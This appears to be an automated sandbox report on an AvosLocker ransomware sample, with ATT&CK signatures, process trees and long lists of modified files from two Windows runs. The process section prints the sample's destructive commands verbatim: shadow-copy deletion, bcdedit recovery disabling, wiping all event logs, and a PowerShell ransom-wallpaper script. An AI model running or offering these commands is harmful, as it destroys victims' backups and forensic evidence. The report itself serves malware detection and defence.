Malware Analysis Report

2024-10-16 03:27

Sample ID 240923-j45gyszflm
Target 2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike
SHA256 7d1e470e36c68e1156a7828f8002254dcde68dc61f998ab5636c12ba63f472dd
Tags
avoslocker defense_evasion discovery evasion execution impact ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7d1e470e36c68e1156a7828f8002254dcde68dc61f998ab5636c12ba63f472dd

Threat Level: Known bad

The file 2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike was found to be: Known bad.

Malicious Activity Summary

avoslocker defense_evasion discovery evasion execution impact ransomware

Avoslocker Ransomware

Renames multiple (8471) files with added filename extension

Modifies boot configuration data using bcdedit

Deletes shadow copies

Renames multiple (10403) files with added filename extension

Enumerates connected drives

Drops desktop.ini file(s)

Sets desktop wallpaper using registry

Drops file in Program Files directory

Unsigned PE

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

Interacts with shadow copies

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-23 08:14

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-23 08:14

Reported

2024-09-23 08:16

Platform

win7-20240903-en

Max time kernel

120s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (10403) files with added filename extension

ransomware

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\247783023.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe

"C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe"

C:\Windows\system32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\system32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\247783023.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

N/A

Files

C:\GET_YOUR_FILES_BACK.txt

MD5 e88368c43d7de561cfbedc2b648244da
SHA1 44ec9116dd8dfe89df6549f96ec18dccef15cd20
SHA256 6ab96b28dc9bc5dd0130e8eee1a8810b87b60feeff054a6a8fa509110aaaa881
SHA512 e123f63bd0ff2507634c16832d71e3be6f9e52b39df4b1bd3003035f68c1c4c5692cf3cd566cfca4247569e7fe8da0c40aea2f78b9a7797def8de8b0eeef28fd

memory/1592-1208-0x00000000021A0000-0x00000000021A8000-memory.dmp

memory/1592-1196-0x000000001B6B0000-0x000000001B992000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 1a65aed315425671eea1a56e72ad8b03
SHA1 b51e4268f35b7eec4a29744047cc618af0cd4614
SHA256 f11364f50429da1c0d63e9d1b138998d73780a81c1b8ac4a62177a21ae9f5ea6
SHA512 e6bdade527f3e9ed8508ee636b537e6f7eedeb3aa2aac073eee57e611083ee1973708b2b56ef7978b90bb6e22947be56c299a59bafdcd124a8f9b0f7dccb5347

memory/6012-24554-0x000000001B670000-0x000000001B952000-memory.dmp

memory/6012-24555-0x00000000021E0000-0x00000000021E8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-23 08:14

Reported

2024-09-23 08:16

Platform

win10v2004-20240802-en

Max time kernel

92s

Max time network

93s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (8471) files with added filename extension

ransomware

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\526292617.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-white_scale-180.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\libffi.md C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\EmptySearch.scale-400.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OsfInstallerConfigOnLogon.xml C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\LICENSE C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\RHP_icons_2x.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_SubTrial-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_organize_18.svg C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.scale-100.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.scale-80.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\DataStreamerLibrary.dll.config C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\chrome_100_percent.pak C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\ui-strings.js C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_cs_135x40.svg C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\acrobat_pdf.svg C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\UnregisterProtect.nfo C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\MSYHBD.TTC C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordR_Retail-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\VisualElements\LogoCanary.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\hu.pak C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\VisualElements\LogoCanary.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-GoogleCloudCacheMini.scale-125.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\fonts\LucidaTypewriterBold.ttf C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\css\main.css C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ui-strings.js C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\pt-br\ui-strings.js C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\tool-search-2x.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sv-se\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription3-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Office 2007 - 2010.xml C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\README.md C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-Bold.otf C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-96_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\editvideoimage.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Yahoo-Dark.scale-200.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECLIPSE\ECLIPSE.INF C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Internet Explorer\en-US\iexplore.exe.mui C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\fa.pak C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-gb\outlook_whatsnew.xml C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\ado\ja-JP\msader15.dll.mui C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\WindowsApps\MutableBackup\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeBadge.scale-150.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Common Files\System\ado\fr-FR\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\ink\uk-UA\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\Windows Defender\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Media Player\fr-FR\wmpnetwk.exe.mui C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\JOURNAL\PREVIEW.GIF C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019R_Retail-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\models\es-ES.mail.config C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\1949_20x20x32.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-40.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\gu\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\webkit.md C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pl-pl\ui-strings.js C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nl-nl\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_2x.png C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2024-09-23_9593e6fcf3366f0518b40dce630b6351_avoslocker_cobalt-strike.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
